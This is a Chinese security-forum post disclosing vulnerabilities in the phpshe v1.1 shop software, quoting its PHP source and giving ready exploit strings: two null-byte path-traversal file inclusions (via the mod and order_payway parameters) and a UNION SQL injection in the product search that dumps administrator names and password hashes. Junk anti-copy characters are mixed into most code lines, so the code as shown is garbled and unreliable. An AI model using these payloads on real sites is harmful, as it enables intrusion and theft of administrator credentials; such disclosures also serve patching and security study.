中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-16 16:45
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
# t0 K/ d5 ]. O* T/* Phpshe v1.1 Vulnerability
  G/ ^0 |) ]9 g4 Z  o+ O' x/* ========================
+ G" Y' F+ l, r, b$ z/* By: : Kn1f3  I  {" z- j2 g# m# C
/* E-Mail : 681796@qq.com8 B. O, X3 z' Q6 C! o4 }0 \
/*******************************************************/
! w6 }' J( ?% `0×00 整体大概参数传输; R9 D. l# _. c% K% R! v' w+ Q8 p

8 E: G; L. E& _; p; a; Y- s
, V' y- h+ X/ o1 O6 W7 V2 }, d' _1 l; b
//common.php+ S6 B, f) }# K6 U" T% i- C# J
if (get_magic_quotes_gpc()) {
" s' p6 \# G$ Q7 a! ~# D0 a  h# o!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');3 V) y( ~! z% h4 B7 N2 S7 i1 @
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
$ U# C! p0 I# z2 d, X}
9 s5 [4 a* J' P+ Z. E) w. Gelse {/ g7 s& `& i% d' Z% X
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');9 n- h1 {! f1 T& Y
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');) V& J' x- z5 q! }
}
: s, }$ U* z& J& t: P" u8 G( isession_start();( H  m: c$ a% _' h# \
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
1 O3 {0 C$ G2 i: x( x!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
/ e: ]& y# }" f& E: O
& O" Q3 }: i. t5 F0×01 包含漏洞
1 Y# v' Y: D# K4 @1 J7 u , @# L2 j. A, J5 l3 r& c
; Y; x, w) X4 x7 I! }
//首页文件/ A9 w' K- ]. k: P# f, ?, y
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);# C* Y! f- P( h* _& K
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞! A) a: Z  Y+ s' H# o
pe_result();6 W- M2 L/ X/ O
?>
. N% J+ R9 Z6 f" m; |//common 文件 第15行开始9 M# k! I" ]; I
url路由配置' o9 |% W/ j+ j' M8 G
$module = $mod = $act = 'index';; ?/ n/ k1 C7 E7 s
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
, a4 v& n3 I. E# K) P& o- \2 I$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);' o$ ]$ H" u  q, l9 t
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);$ f- a5 r, c& F# ~! ~6 W
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%008 V& r3 X! A/ T- a6 O0 i- q- @: v

. B! Y% x7 Y' W

8 z  b  P+ z5 {% K 0×02 搜索注入
! b& y3 n, C6 X& M- s2 j( b
/ G3 w6 R. I, n8 e" N' N( f3 L<code id="code2">

//product.php文件% V  w  X2 b, ^* t( E  q
case 'list':4 i; _. ?- Y2 q: N# p3 h
$category_id = intval($id);
. i2 }1 t7 d; V' W$info = $db->pe_select('category', array('category_id'=>$category_id));& b7 ^' G2 V6 T  G
//搜索
9 E  v8 d  j& b" a  V$sqlwhere = " and `product_state` = 1";, J' q- a; F; B( n' j
pe_lead('hook/category.hook.php');) t  K- H6 c6 ?6 C2 _6 {
if ($category_id) {* ]+ n- }8 p* I; T' R7 k5 G
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
* h+ s/ c8 s6 o) F# G5 \}" h: b0 g( B" C& ^
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤$ D1 H1 K8 Q$ [
if ($_g_orderby) {
: w! `. ]* R+ i' j6 w, r+ F$orderby = explode('_', $_g_orderby);
$ x: `, b7 N9 \$ Y0 y* Y. C$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";4 j* I! p4 }! v3 A! c
}
* v4 D" T1 u5 M1 m  eelse {+ h) s6 U& M4 S3 P( n3 L! Z
$sqlwhere .= " order by `product_id` desc";
: q5 Y  {& ^2 I; [2 B% }}% M: q9 C& S- x' [( Q( B2 ?
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));: @: j, g' a3 L" L4 K- I; V
//热卖排行3 g; V& Z7 B$ a
$product_hotlist = product_hotlist();: {' q/ C( X2 P& M
//当前路径
- T/ K8 O- D* _+ L$nowpath = category_path($category_id);" O2 C/ y! ~3 A; |
$seo = pe_seo($info['category_name']);- L9 i" A* M; S+ k9 f0 v9 d2 ^
include(pe_tpl('product_list.html'));' l1 q% O& z( Z5 z5 U
//跟进selectall函数库# w, `$ l8 k; C& ]) G1 C
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
4 O0 F5 r5 P+ ?: @$ J( Z{
) n6 O) u& U! A. c//处理条件语句1 R" O! N* ^! P0 q& ~0 ~4 j( g" j
$sqlwhere = $this->_dowhere($where);) ~6 `) g! f$ Z0 B0 `, b7 U
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);9 `6 ^9 X5 r; P/ s4 S7 i
}
' {2 V4 {6 ^4 `8 ~//exp
. P2 u8 H+ n. m& _" v+ m) L5 B5 nproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='14 d5 O6 f! P6 m4 @5 v1 Y

</code>& P" V  k* K$ s+ o3 s
$ o. ~- U, j  Z
0×03 包含漏洞2
0 I: m1 E( o# ^3 ]% Q
" f$ ~( Y7 f1 Z<code id="code3">

//order.php

case 'pay':


' j( ?, L& B' @6 m& p$order_id = pe_dbhold($_g_id);

; }3 t% E4 h  ]5 U- q
$cache_payway = cache::get('payway');

4 Z8 p9 a7 W  D1 B) w
foreach($cache_payway as $k => $v) {


2 h/ ], j5 d9 N, C. P8 Y$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

/ \" d5 [8 W0 [& W$ _
if ($k == 'bank') {


  X. g4 M' f$ K' t/ X3 z# \$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

- z) a/ R0 U& v3 R6 x+ v: ]
}

# J4 h. u1 o0 n& n+ L
}


! G/ \, `  O$ Q: t" K3 g$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


5 z, f* r) j- v3 `0 J4 a!$order['order_id'] && pe_error('订单号错误...');

( T* L4 f0 n2 U- f
if (isset($_p_pesubmit)) {


! e% v, D- H. b* j7 w2 pif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

- l2 [$ R: Y$ c4 V) a+ {+ `+ r
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

' O4 K4 T8 L' R9 }; A4 W7 Y
foreach ($info_list as $v) {


$ P1 Y# b' Y6 t- [$order['order_name'] .= "{$v['product_name']};";
2 F5 T' a# a+ l4 K


/ E0 }# ~3 J3 B1 W' n- }}

0 ~3 k5 D" F7 r1 ?7 F0 m
echo '正在为您连接支付网站,请稍后...';

, d8 d9 t3 L4 H2 p5 }0 k6 c/ u
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

. L9 m" A* A# }" {
}//当一切准备好的时候就可以进行"鸡肋包含了"

4 o+ ]: w! ~  ?* g' C/ h3 P) A+ A
else {

3 k5 }7 w  P% E; y
pe_error('支付错误...');

3 S" W6 m& W* \3 y& ~
}


& c/ I& ]4 v/ i3 n}

/ x+ c/ g/ A, |0 C% _# v) o
$seo = pe_seo('选择支付方式');


9 W. [: h3 l: X0 V% tinclude(pe_tpl('order_pay.html'));

, e- ], g/ B  x
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
" Y% j2 E* G) ^$ ^5 p# Q* n$ Q5 s+ ^http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2